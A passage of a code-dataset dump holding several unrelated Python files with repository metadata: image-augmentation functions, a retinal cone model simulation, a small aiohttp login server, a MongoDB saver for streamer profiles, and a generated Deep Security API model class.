sublime.set_timeout(lambda: self.handle_threads(), 1000)\n return\n\n print(\"done? Reustl is {}\" % self.session_thread.result)\n","repo_name":"notbaab/CodeWarsAPI","sub_path":"codewars/commands/submit_kata.py","file_name":"submit_kata.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38713007267","text":"from pymongo import MongoClient\n\ndb = MongoClient('192.168.1.180', port=32766)['pltaobao']['anchor_app_data']\n\n\ndef save_taobaoanchor_app_data(origin_data):\n resultList = origin_data.get('resultList')\n for result in resultList:\n res = db.find_one({'_id': int(result.get('userId'))})\n if not res:\n data = {\n '_id': int(result.get('userId')),\n 'name': result.get('name'),\n 'certName': result.get('certName'),\n 'city': result.get('city'),\n 'fansCount': result.get('fansCount'),\n 'headImage': result.get('headImage'),\n }\n print(data)\n db.insert_one(data)\n","repo_name":"1987128073/project","sub_path":"pinyou/taobao_2/taobaolive_spider_redis/save_taobaozhubo_app.py","file_name":"save_taobaozhubo_app.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22455790413","text":"N = int(input())\n\nn_list = sorted(list(map(int, input().split())))\n\nX = int(input())\n\ni = 0\nj = N-1\ncnt = 0\nwhile i < j:\n comp = n_list[i] + n_list[j]\n if comp == X:\n cnt+=1\n j-=1\n elif comp < X: # 값을 더해줘야 한다.\n i+=1\n elif comp > X: # 값을 빼준다.\n j-=1\n \nprint(cnt)","repo_name":"parksey/baekjoon","sub_path":"twoPoint/3273.py","file_name":"3273.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5585713693","text":"\"\"\"Implemenations of frequently use image augmentation methods\"\"\"\nfrom functools import partial\nfrom typing import Optional, Tuple, Union\n\nimport tensorflow as tf\n\n\ndef _make_pairs(batch_size: int, threshold: float) -> tf.Tensor:\n \"\"\"Generate pairs from given batch size.\n\n Args:\n batch_size (int) : Batch Size.\n threshold (float) : threshold to generate pairs with different index.\n\n Returns:\n tf.Tensor : Pairs of index for given batch size.\n \"\"\"\n image_prob_grib = tf.fill((batch_size, batch_size), 0.5, name=None)\n image_log_prob_grib = tf.math.log(tf.linalg.set_diag(image_prob_grib, tf.zeros(batch_size) + 1e-7))\n mix_indices = tf.squeeze(tf.random.categorical(image_log_prob_grib, 1, dtype=tf.int32))\n ranges = tf.range(batch_size)\n # pylint: disable=no-value-for-parameter\n mix_indices = tf.where(tf.random.uniform([batch_size]) > threshold, mix_indices, ranges)\n pairs = tf.transpose([ranges, mix_indices])\n return pairs\n\n\ndef _estimated_beta_distribution(\n concentration_0: float = 1.0, concentration_1: float = 1.0, size: Optional[int] = None\n) -> tf.Tensor:\n \"\"\"Beta distribution based on gamma.\n\n Args:\n concentration_0 (float, optional): Alpaha, positive (>0). Defaults to 1.0.\n concentration_1 (float, optional): Beta, positive (>0). Defaults to 1.0.\n size (int, optional): Default to None.\n\n Returns:\n tf.Tensor: Estimated beta distribution based on Alpha and Beta.\n \"\"\"\n if isinstance(size, type(None)):\n x = tf.random.gamma(shape=[], alpha=concentration_0)\n y = tf.random.gamma(shape=[], alpha=concentration_1)\n else:\n x = tf.random.gamma(shape=[size], alpha=concentration_0)\n y = tf.random.gamma(shape=[size], alpha=concentration_1)\n return x / (x + y)\n\n\ndef _get_random_box(\n combination_ratio: float, height: int, width: int\n) -> Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor]:\n \"\"\"random bounding box generator.\n\n Args:\n combination_ratio (float): target ratio of bounding box\n height (int): height of image\n width (int): width of image\n\n Returns:\n Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor]: Tuple[\n Vertical coordinate of the top-left corner, Horizontal coordinate of the top-left corner, Height, Width]\n \"\"\"\n cut_rat = tf.math.sqrt(1.0 - combination_ratio)\n cut_w = tf.cast((width * cut_rat), tf.int32)\n cut_h = tf.cast((height * cut_rat), tf.int32)\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n cut_x = tf.random.uniform([], minval=0, maxval=width, dtype=tf.int32)\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n cut_y = tf.random.uniform([], minval=0, maxval=height, dtype=tf.int32)\n\n x2 = tf.clip_by_value(cut_x + cut_w // 2, 1, width)\n y2 = tf.clip_by_value(cut_y + cut_h // 2, 1, height)\n x1 = tf.clip_by_value(cut_x - cut_w // 2, 0, x2 - 1)\n y1 = tf.clip_by_value(cut_y - cut_h // 2, 0, y2 - 1)\n\n width = x2 - x1\n height = y2 - y1\n\n return x1, y1, height, width\n\n\ndef cutmix(\n images: tf.Tensor,\n labels: tf.Tensor,\n cutmix_threshold: float = 0.5,\n image_dimension: int = 3,\n beta: float = 1.0,\n) -> Tuple[tf.Tensor, tf.Tensor]:\n \"\"\"implementation of cutmix augmentation.\n See [CutMix: Regularization Strategy to Train Strong Classifiers with Localizable Features]\n (https://arxiv.org/abs/1905.04899)\n\n Args:\n images (tf.Tensor): Batch of images to process.\n labels (tf.Tensor): Labels of images to process. This function excepted labels to be one-hot encoded.\n cutmix_threshold (float, optional): Defaults to 0.5.\n image_dimension (int, optional): Defaults to 3.\n beta (float, optional): Positive (>0), Defaults to 1.0.\n\n Raises:\n ValueError: if dimesion of images is less than image_dimension+1.\n\n Returns:\n Tuple[tf.Tensor,tf.Tensor]: Tuple[images, labels]\n \"\"\"\n\n shape = images.shape\n label_shape = labels.shape\n batch_size = tf.shape(images)[0]\n if labels.dtype != tf.float32:\n labels = tf.cast(labels, tf.float32)\n\n if beta <= 0:\n raise ValueError(\"Beta must be greater than zero.\")\n if images.shape.ndims != image_dimension + 1:\n raise ValueError(f\"Only batch of images is accepted. Input Images Dimesnion must be {image_dimension+1}\")\n\n def _mix(pair, height, width):\n img1 = images[pair[0]]\n label1 = labels[pair[0]]\n if pair[0] != pair[1]:\n img2 = images[pair[1]]\n label2 = labels[pair[1]]\n\n combination_ratio = _estimated_beta_distribution(beta, beta)\n x1, y1, target_height, target_width = _get_random_box(combination_ratio, height, width)\n\n crop_blank_img1 = tf.image.pad_to_bounding_box(\n tf.image.crop_to_bounding_box(img1, y1, x1, target_height, target_width), y1, x1, height, width\n )\n cropped_img1 = img1 - crop_blank_img1\n crop_blank_img2 = tf.image.pad_to_bounding_box(\n tf.image.crop_to_bounding_box(img2, y1, x1, target_height, target_width), y1, x1, height, width\n )\n mix_img = cropped_img1 + crop_blank_img2\n\n combination_ratio = 1 - (target_height * target_width) / (height * width)\n combination_ratio = tf.cast(combination_ratio, tf.float32)\n label = combination_ratio * label1 + (1 - combination_ratio) * label2\n\n return (mix_img, label)\n return (img1, label1)\n\n pairs = _make_pairs(batch_size, cutmix_threshold)\n mix = partial(_mix, height=shape[1], width=shape[2])\n return tf.map_fn(\n mix,\n pairs,\n fn_output_signature=(\n tf.TensorSpec(shape=shape[1:], dtype=images.dtype),\n tf.TensorSpec(shape=label_shape[1:], dtype=labels.dtype),\n ),\n )\n\n\ndef mixup(\n images: tf.Tensor,\n labels: tf.Tensor,\n mixup_threshold: float = 0.5,\n image_dimension: int = 3,\n beta: float = 1.0,\n) -> Tuple[tf.Tensor, tf.Tensor]:\n \"\"\"implementation of mixup augmentation.\n See [mixup: Beyond Empirical Risk Minimization] (https://arxiv.org/abs/1710.09412v2)\n\n Args:\n images (tf.Tensor): Batch of images to process.\n labels (tf.Tensor): Labels of images to process. This function excepted labels to be one-hot encoded.\n mixup_threshold (float, optional): Defaults to 0.5.\n image_dimension (int, optional): Defaults to 3.\n beta (float, optional): Positive (>0), Defaults to 1.0.\n\n Raises:\n ValueError: if dimesion of images is less than image_dimension+1.\n\n Returns:\n Tuple[tf.Tensor,tf.Tensor]: Tuple[images, labels]\n \"\"\"\n\n batch_size = tf.shape(images)[0]\n\n if images.shape.ndims != image_dimension + 1:\n raise ValueError(f\"Only batch of images is accepted. Input Images Dimesnion must be {image_dimension+1}\")\n\n pairs = _make_pairs(batch_size, mixup_threshold)\n\n if beta > 0:\n combination_ratio = _estimated_beta_distribution(beta, beta, size=batch_size)\n else:\n combination_ratio = tf.ones([batch_size])\n\n original_images_type = images.dtype\n if images.dtype != tf.float32:\n images = tf.image.convert_image_dtype(images, tf.float32)\n if labels.dtype != tf.float32:\n labels = tf.cast(labels, tf.float32)\n\n # pylint: disable=no-value-for-parameter\n images = tf.einsum(\"b...,b->b...\", images, combination_ratio) + tf.einsum(\n \"b...,b->b...\", tf.gather(images, pairs[:, 1]), 1 - combination_ratio\n )\n # pylint: disable=no-value-for-parameter\n labels = tf.einsum(\"b...,b->b...\", labels, combination_ratio) + tf.einsum(\n \"b...,b->b...\", tf.gather(labels, pairs[:, 1]), 1 - combination_ratio\n )\n\n if images.dtype != original_images_type:\n images = tf.image.convert_image_dtype(images, original_images_type)\n\n return images, labels\n\n\ndef random_erasing(\n image: tf.Tensor,\n label: tf.Tensor,\n random_erasing_threshold: float = 0.5,\n scale: Tuple[float, float] = (0.02, 0.4),\n ratio: Tuple[float, float] = (0.3, 3.3),\n value: Union[Tuple[float, float, float], float, str] = (0.4914, 0.4822, 0.4465),\n max_attempt: int = 50,\n) -> Tuple[tf.Tensor, tf.Tensor]:\n \"\"\"implementattion of random erasing augmentation.\n See [Random Erasing Data Augmentation] (https://arxiv.org/abs/1708.04896)\n\n Args:\n image (tf.Tensor): image to process\n label (tf.Tensor): label of the image\n random_erasing_threshold (float, optional): Defaults to 0.5.\n scale (Tuple[float, float], optional): Defaults to (0.02, 0.4).\n ratio (Tuple[float, float], optional): Defaults to (0.3, 3.3).\n value (Union[Tuple[float, float, float], float, str], optional): Defaults to (0.4914, 0.4822, 0.4465).\n max_attempt (int, optional): Defaults to 50.\n\n Raises:\n ValueError: if value is string and not in [\"random\",\"black\",\"white\"].\n\n Returns:\n Tuple[tf.Tensor,tf.Tensor]: Tuple[image, label]\n \"\"\"\n accepted_str_values = (\"random\", \"black\", \"white\")\n\n shape = image.shape\n height = shape[0]\n width = shape[1]\n\n def _erase(image, y1, x1, h, w, value):\n crop_blank = tf.image.pad_to_bounding_box(\n tf.image.crop_to_bounding_box(image, y1, x1, h, w), y1, x1, height, width\n )\n image = image - crop_blank\n value_add = tf.image.pad_to_bounding_box(value, y1, x1, height, width)\n return image + value_add\n\n if isinstance(value, str):\n if value not in accepted_str_values:\n raise ValueError(\"if value is str, it should be random or black or white\")\n\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n if tf.random.uniform([]) <= random_erasing_threshold:\n return image, label\n\n for _ in tf.range(max_attempt):\n area = height * width\n # pylint: disable=unexpected-keyword-arg, no-value-for-parameter\n target_area = tf.random.uniform([], minval=scale[0], maxval=scale[1]) * area\n aspect_ratio = tf.random.uniform([], minval=ratio[0], maxval=ratio[1])\n\n h = tf.cast(tf.round(tf.math.sqrt(target_area * aspect_ratio)), tf.int32)\n w = tf.cast(tf.round(tf.math.sqrt(target_area / aspect_ratio)), tf.int32)\n\n if w < width and h < height:\n x1 = tf.random.uniform([], minval=0, maxval=width - w, dtype=tf.int32)\n y1 = tf.random.uniform([], minval=0, maxval=height - h, dtype=tf.int32)\n\n if value == \"black\":\n value_add = tf.image.convert_image_dtype(tf.cast(tf.fill([h, w, shape[2]], 0), tf.uint8), image.dtype)\n image = _erase(image, y1, x1, h, w, value_add)\n\n if value == \"white\":\n value_add = tf.image.convert_image_dtype(\n tf.cast(tf.fill([h, w, shape[2]], 255), tf.uint8), image.dtype\n )\n image = _erase(image, y1, x1, h, w, value_add)\n\n if value == \"random\":\n value_add = tf.image.convert_image_dtype(tf.random.normal([h, w, shape[2]]), image.dtype)\n image = _erase(image, y1, x1, h, w, value_add)\n\n if isinstance(value, tuple):\n r = tf.fill([h, w], value[0])\n g = tf.fill([h, w], value[1])\n b = tf.fill([h, w], value[2])\n value_add = tf.image.convert_image_dtype(tf.stack([r, g, b], axis=-1), image.dtype)\n image = _erase(image, y1, x1, h, w, value_add)\n\n if isinstance(value, float):\n value_add = tf.image.convert_image_dtype(tf.fill([h, w, shape[2]], value), image.dtype)\n image = _erase(image, y1, x1, h, w, value_add)\n break\n return image, label\n","repo_name":"yeyinthtoon/tf2-img-aug","sub_path":"imgaug/classification/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":11782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30104337351","text":"from aiohttp import web\nfrom router_handler import RouterHandler\nimport asyncio\n\n\ndef start_server(host, port):\n _loop = asyncio.get_event_loop()\n app = web.Application(loop=_loop)\n\n handler = RouterHandler(_loop)\n\n app.router.add_post('/create_user', handler.create_user)\n app.router.add_post('/login', handler.login)\n app.router.add_route('GET', '/user', handler.get_user_info)\n app.router.add_post('/cache_user', handler.set_user_info)\n\n web.run_app(\n app,\n host=host,\n port=port\n )\n\n\ndef main():\n print()\n print(\"__Hoang Thanh Lam__\")\n print()\n\n host = 'localhost'\n port = 8096\n start_server(host, port)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"VegetaIV/login_api_v3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25774031836","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# This file is part of the project published in [1,2].\n#\n# The software is licensed under the GNU General Public License. You should have\n# received a copy of the GNU General Public License along with the source code.\n#\n#\n# BeginDocumentation\n#\n# Name: test_vanHateren\n#\n# Description: example of performance of the different stages in van Hateren's\n# model. The model reproduces results shown in Fig. 6 [3] using a simple stimulus,\n# a 100-ms step of contrast 2 at a background illuminance of 100 td.\n#\n# References:\n#\n# [1] Martinez-Cañada, P., Morillas, C., Pelayo, F. (2018). A Neuronal Network Model\n# of the Primate Visual System: Color Mechanisms in the Retina, LGN and V1. In\n# International Journal of Neural Systems. Accepted for publication.\n#\n# [2] Martinez-Cañada, P., Morillas, C., Pelayo, F. (2017). A Conductance-Based\n# Neuronal Network Model for Color Coding in the Primate Foveal Retina. In IWINAC\n# 2017\n#\n# [3] van Hateren, Hans. \"A cellular and molecular model of response kinetics\n# and adaptation in primate cones and horizontal cells.\" Journal of vision 5.4\n# (2005): 5-5.\n#\n# Author: Martinez-Cañada, P. (pablomc@ugr.es)\n#\n\nimport numpy as np\nimport sys,os\nimport matplotlib.pyplot as plt\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', '..','models'))\n\nimport cone_VanHateren\n\ndef main():\n\n # Model parameters (from Fig.7 and Table 1 [1])\n tauR = 0.49\n tauE = 16.8\n cb = 2.8 * 10**(-3)\n kb = 1.63 * 10**(-4)\n nX = 1.0\n tauC = 2.89\n ac = 9.08 * 10**(-2)\n nc = 4.0\n taum = 4.0\n ais = 7.09 * 10**(-2)\n gamma = 0.678\n tauis = 56.9\n gs = 8.81 # from Fig. 8 (linear horizontal-cell feedback)\n tau1 = 4.0\n tau2 = 4.0\n tauh = 20.0\n githr = 0.4\n\n # Simulation parameters\n step = 0.2 # ms (larger values make horizontal feedback unstable)\n tsim = 600.0 # ms\n\n # Pulse parameters\n pulse_duration = 100.0 # ms\n pulse_tstart = 325.0 # ms (first 300 ms are used to fill the input and\n # output buffers of linear filters)\n bkg_illuminance = 100.0 # td\n pulse_contrast = 2.0\n pulse_amplitude = pulse_contrast * bkg_illuminance # td\n\n # Constants calculated by using a dark stimulus\n # (bkg_illuminance = pulse_amplitude = 0)\n Vis_dark = 30.39 # mV\n Vh_dark = 26.05 # mV\n\n # Create cone model\n cone = cone_VanHateren.cone(step,tauR,tauE,cb,kb,nX,tauC,ac,nc,taum,ais,\n gamma,tauis,gs,tau1,tau2,tauh,githr,True)\n\n # Records of model response\n response = np.zeros((14,int(tsim/step)))\n\n # Fixed time-step simulation\n time = []\n for t in np.arange(0,int(tsim/step)):\n # input value\n if(t*step >= pulse_tstart and t*step < pulse_tstart + pulse_duration):\n input = bkg_illuminance + pulse_amplitude\n else:\n input = bkg_illuminance\n\n # update dynamics of the model\n cone.feedInput(input)\n cone.update()\n # record response values\n time.append(t*step)\n response[0,t] = input\n response[1,t] = cone.LF_tauE.last_values[0]\n response[2,t] = cone.beta\n response[3,t] = cone.Q\n response[4,t] = cone.Q / cone.alpha\n response[5,t] = cone.LF_X.last_values[0]\n response[6,t] = cone.LF_tauC.last_values[0]\n response[7,t] = cone.alpha\n response[8,t] = cone.LF_taum.last_values[0] - Vis_dark\n response[9,t] = cone.gi\n response[10,t] = cone.LF_taum.last_values[0] -\\\n cone.LF_tauh.last_values[0]\n response[11,t] = cone.It\n response[12,t] = cone.LF_tau2.last_values[0]\n response[13,t] = cone.LF_tauh.last_values[0] - Vh_dark\n\n\n # Plot response of the different processing stages\n f, axarr = plt.subplots(7, 2)\n f.subplots_adjust(hspace=1.5)\n f.subplots_adjust(wspace=0.4)\n\n row = 0\n col = 0\n for k in np.arange(14):\n # First 300 ms are discarded\n axarr[row,col].plot(time[int(300.0/step):len(time)],\n response[k,int(300.0/step):len(time)])\n plt.setp(axarr[row,col], yticks=\n [(np.min(response[k,int(300.0/step):len(time)])),\n (np.max(response[k,int(300.0/step):len(time)]))],\n yticklabels=\n [str(round(np.min(response[k,int(300.0/step):len(time)]),2)),\n str(round(np.max(response[k,int(300.0/step):len(time)]),2))])\n if(k<6):\n col = 0\n row+=1\n elif(k==6):\n col = 1\n row = 0\n else:\n col = 1\n row+=1\n\n\n axarr[0,0].set_title('Illuminance (td)')\n axarr[1,0].set_title('E*')\n axarr[2,0].set_title('Beta')\n axarr[3,0].set_title('1/Beta')\n axarr[4,0].set_title('alpha/Beta')\n axarr[5,0].set_title('X')\n axarr[6,0].set_title('C')\n axarr[0,1].set_title('1/alpha')\n axarr[1,1].set_title('Vis - Vis_dark')\n axarr[2,1].set_title('gi')\n axarr[3,1].set_title('Vs')\n axarr[4,1].set_title('It')\n axarr[5,1].set_title('Vb')\n axarr[6,1].set_title('Vh - Vh_dark')\n axarr[6,0].set_xlabel('time (ms)')\n axarr[6,1].set_xlabel('time (ms)')\n\n plt.show()\n\nif __name__ == '__main__':\n main()\n","repo_name":"pablomc88/Primate_Visual_System","sub_path":"simulation/retina/test_vanHateren.py","file_name":"test_vanHateren.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"34423385205","text":"# coding: utf-8\r\n\r\n\"\"\"\r\n Trend Micro Deep Security API\r\n\r\n Copyright 2018 - 2020 Trend Micro Incorporated.
    Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501\r\n\r\n OpenAPI spec version: 20.0.186\r\n \r\n Generated by: https://github.com/swagger-api/swagger-codegen.git\r\n\"\"\"\r\n\r\n\r\nimport pprint\r\nimport re # noqa: F401\r\n\r\nimport six\r\n\r\n\r\nclass ApplicationType(object):\r\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\r\n\r\n Do not edit the class manually.\r\n \"\"\"\r\n\r\n \"\"\"\r\n Attributes:\r\n swagger_types (dict): The key is attribute name\r\n and the value is attribute type.\r\n attribute_map (dict): The key is attribute name\r\n and the value is json key in definition.\r\n \"\"\"\r\n swagger_types = {\r\n 'name': 'str',\r\n 'description': 'str',\r\n 'minimum_agent_version': 'str',\r\n 'direction': 'str',\r\n 'protocol': 'str',\r\n 'port_type': 'str',\r\n 'port_multiple': 'list[str]',\r\n 'port_list_id': 'int',\r\n 'recommendations_mode': 'str',\r\n 'id': 'int'\r\n }\r\n\r\n attribute_map = {\r\n 'name': 'name',\r\n 'description': 'description',\r\n 'minimum_agent_version': 'minimumAgentVersion',\r\n 'direction': 'direction',\r\n 'protocol': 'protocol',\r\n 'port_type': 'portType',\r\n 'port_multiple': 'portMultiple',\r\n 'port_list_id': 'portListID',\r\n 'recommendations_mode': 'recommendationsMode',\r\n 'id': 'ID'\r\n }\r\n\r\n def __init__(self, name=None, description=None, minimum_agent_version=None, direction=None, protocol=None, port_type=None, port_multiple=None, port_list_id=None, recommendations_mode=None, id=None): # noqa: E501\r\n \"\"\"ApplicationType - a model defined in Swagger\"\"\" # noqa: E501\r\n\r\n self._name = None\r\n self._description = None\r\n self._minimum_agent_version = None\r\n self._direction = None\r\n self._protocol = None\r\n self._port_type = None\r\n self._port_multiple = None\r\n self._port_list_id = None\r\n self._recommendations_mode = None\r\n self._id = None\r\n self.discriminator = None\r\n\r\n if name is not None:\r\n self.name = name\r\n if description is not None:\r\n self.description = description\r\n if minimum_agent_version is not None:\r\n self.minimum_agent_version = minimum_agent_version\r\n if direction is not None:\r\n self.direction = direction\r\n if protocol is not None:\r\n self.protocol = protocol\r\n if port_type is not None:\r\n self.port_type = port_type\r\n if port_multiple is not None:\r\n self.port_multiple = port_multiple\r\n if port_list_id is not None:\r\n self.port_list_id = port_list_id\r\n if recommendations_mode is not None:\r\n self.recommendations_mode = recommendations_mode\r\n if id is not None:\r\n self.id = id\r\n\r\n @property\r\n def name(self):\r\n \"\"\"Gets the name of this ApplicationType. # noqa: E501\r\n\r\n Display name of the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :return: The name of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._name\r\n\r\n @name.setter\r\n def name(self, name):\r\n \"\"\"Sets the name of this ApplicationType.\r\n\r\n Display name of the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :param name: The name of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n\r\n self._name = name\r\n\r\n @property\r\n def description(self):\r\n \"\"\"Gets the description of this ApplicationType. # noqa: E501\r\n\r\n Description of the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :return: The description of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._description\r\n\r\n @description.setter\r\n def description(self, description):\r\n \"\"\"Sets the description of this ApplicationType.\r\n\r\n Description of the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :param description: The description of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n\r\n self._description = description\r\n\r\n @property\r\n def minimum_agent_version(self):\r\n \"\"\"Gets the minimum_agent_version of this ApplicationType. # noqa: E501\r\n\r\n Version of the Deep Security agent or appliance required to support the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :return: The minimum_agent_version of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._minimum_agent_version\r\n\r\n @minimum_agent_version.setter\r\n def minimum_agent_version(self, minimum_agent_version):\r\n \"\"\"Sets the minimum_agent_version of this ApplicationType.\r\n\r\n Version of the Deep Security agent or appliance required to support the ApplicationType. Searchable as String. # noqa: E501\r\n\r\n :param minimum_agent_version: The minimum_agent_version of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n\r\n self._minimum_agent_version = minimum_agent_version\r\n\r\n @property\r\n def direction(self):\r\n \"\"\"Gets the direction of this ApplicationType. # noqa: E501\r\n\r\n Direction of the initial communication for the ApplicationType (e.g. 'outgoing' for web browsers). Searchable as Choice. # noqa: E501\r\n\r\n :return: The direction of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._direction\r\n\r\n @direction.setter\r\n def direction(self, direction):\r\n \"\"\"Sets the direction of this ApplicationType.\r\n\r\n Direction of the initial communication for the ApplicationType (e.g. 'outgoing' for web browsers). Searchable as Choice. # noqa: E501\r\n\r\n :param direction: The direction of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n allowed_values = [\"incoming\", \"outgoing\"] # noqa: E501\r\n if direction not in allowed_values:\r\n raise ValueError(\r\n \"Invalid value for `direction` ({0}), must be one of {1}\" # noqa: E501\r\n .format(direction, allowed_values)\r\n )\r\n\r\n self._direction = direction\r\n\r\n @property\r\n def protocol(self):\r\n \"\"\"Gets the protocol of this ApplicationType. # noqa: E501\r\n\r\n Protocol used by the ApplicationType. Searchable as Choice. # noqa: E501\r\n\r\n :return: The protocol of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._protocol\r\n\r\n @protocol.setter\r\n def protocol(self, protocol):\r\n \"\"\"Sets the protocol of this ApplicationType.\r\n\r\n Protocol used by the ApplicationType. Searchable as Choice. # noqa: E501\r\n\r\n :param protocol: The protocol of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n allowed_values = [\"icmp\", \"tcp\", \"udp\", \"tcp-udp\"] # noqa: E501\r\n if protocol not in allowed_values:\r\n raise ValueError(\r\n \"Invalid value for `protocol` ({0}), must be one of {1}\" # noqa: E501\r\n .format(protocol, allowed_values)\r\n )\r\n\r\n self._protocol = protocol\r\n\r\n @property\r\n def port_type(self):\r\n \"\"\"Gets the port_type of this ApplicationType. # noqa: E501\r\n\r\n Port number configuration type. Searchable as Choice. # noqa: E501\r\n\r\n :return: The port_type of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._port_type\r\n\r\n @port_type.setter\r\n def port_type(self, port_type):\r\n \"\"\"Sets the port_type of this ApplicationType.\r\n\r\n Port number configuration type. Searchable as Choice. # noqa: E501\r\n\r\n :param port_type: The port_type of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n allowed_values = [\"any\", \"multiple\", \"port-list\"] # noqa: E501\r\n if port_type not in allowed_values:\r\n raise ValueError(\r\n \"Invalid value for `port_type` ({0}), must be one of {1}\" # noqa: E501\r\n .format(port_type, allowed_values)\r\n )\r\n\r\n self._port_type = port_type\r\n\r\n @property\r\n def port_multiple(self):\r\n \"\"\"Gets the port_multiple of this ApplicationType. # noqa: E501\r\n\r\n If portType is multiple, the list of port numbers the ApplicationType monitors. Searchable as String. # noqa: E501\r\n\r\n :return: The port_multiple of this ApplicationType. # noqa: E501\r\n :rtype: list[str]\r\n \"\"\"\r\n return self._port_multiple\r\n\r\n @port_multiple.setter\r\n def port_multiple(self, port_multiple):\r\n \"\"\"Sets the port_multiple of this ApplicationType.\r\n\r\n If portType is multiple, the list of port numbers the ApplicationType monitors. Searchable as String. # noqa: E501\r\n\r\n :param port_multiple: The port_multiple of this ApplicationType. # noqa: E501\r\n :type: list[str]\r\n \"\"\"\r\n\r\n self._port_multiple = port_multiple\r\n\r\n @property\r\n def port_list_id(self):\r\n \"\"\"Gets the port_list_id of this ApplicationType. # noqa: E501\r\n\r\n If portType is port-list, ID of the PortList containing the port numbers the ApplicationType monitors. Set to 0 to remove any assignment. Searchable as Numeric. # noqa: E501\r\n\r\n :return: The port_list_id of this ApplicationType. # noqa: E501\r\n :rtype: int\r\n \"\"\"\r\n return self._port_list_id\r\n\r\n @port_list_id.setter\r\n def port_list_id(self, port_list_id):\r\n \"\"\"Sets the port_list_id of this ApplicationType.\r\n\r\n If portType is port-list, ID of the PortList containing the port numbers the ApplicationType monitors. Set to 0 to remove any assignment. Searchable as Numeric. # noqa: E501\r\n\r\n :param port_list_id: The port_list_id of this ApplicationType. # noqa: E501\r\n :type: int\r\n \"\"\"\r\n\r\n self._port_list_id = port_list_id\r\n\r\n @property\r\n def recommendations_mode(self):\r\n \"\"\"Gets the recommendations_mode of this ApplicationType. # noqa: E501\r\n\r\n Indicates whether recommendation scans consider the ApplicationType. Create an ApplicationType computer or policy override to modify this value. Searchable as Choice. # noqa: E501\r\n\r\n :return: The recommendations_mode of this ApplicationType. # noqa: E501\r\n :rtype: str\r\n \"\"\"\r\n return self._recommendations_mode\r\n\r\n @recommendations_mode.setter\r\n def recommendations_mode(self, recommendations_mode):\r\n \"\"\"Sets the recommendations_mode of this ApplicationType.\r\n\r\n Indicates whether recommendation scans consider the ApplicationType. Create an ApplicationType computer or policy override to modify this value. Searchable as Choice. # noqa: E501\r\n\r\n :param recommendations_mode: The recommendations_mode of this ApplicationType. # noqa: E501\r\n :type: str\r\n \"\"\"\r\n allowed_values = [\"enabled\", \"ignored\", \"unknown\", \"disabled\"] # noqa: E501\r\n if recommendations_mode not in allowed_values:\r\n raise ValueError(\r\n \"Invalid value for `recommendations_mode` ({0}), must be one of {1}\" # noqa: E501\r\n .format(recommendations_mode, allowed_values)\r\n )\r\n\r\n self._recommendations_mode = recommendations_mode\r\n\r\n @property\r\n def id(self):\r\n \"\"\"Gets the id of this ApplicationType. # noqa: E501\r\n\r\n ID of the ApplicationType. Searchable as ID. # noqa: E501\r\n\r\n :return: The id of this ApplicationType. # noqa: E501\r\n :rtype: int\r\n \"\"\"\r\n return self._id\r\n\r\n @id.setter\r\n def id(self, id):\r\n \"\"\"Sets the id of this ApplicationType.\r\n\r\n ID of the ApplicationType. Searchable as ID. # noqa: E501\r\n\r\n :param id: The id of this ApplicationType. # noqa: E501\r\n :type: int\r\n \"\"\"\r\n\r\n self._id = id\r\n\r\n def to_dict(self):\r\n \"\"\"Returns the model properties as a dict\"\"\"\r\n result = {}\r\n\r\n for attr, _ in six.iteritems(self.swagger_types):\r\n value = getattr(self, attr)\r\n if isinstance(value, list):\r\n result[attr] = list(map(\r\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\r\n value\r\n ))\r\n elif hasattr(value, \"to_dict\"):\r\n result[attr] = value.to_dict()\r\n elif isinstance(value, dict):\r\n result[attr] = dict(map(\r\n lambda item: (item[0], item[1].to_dict())\r\n if hasattr(item[1], \"to_dict\") else item,\r\n value.items()\r\n ))\r\n else:\r\n result[attr] = value\r\n if issubclass(ApplicationType, dict):\r\n for key, value in 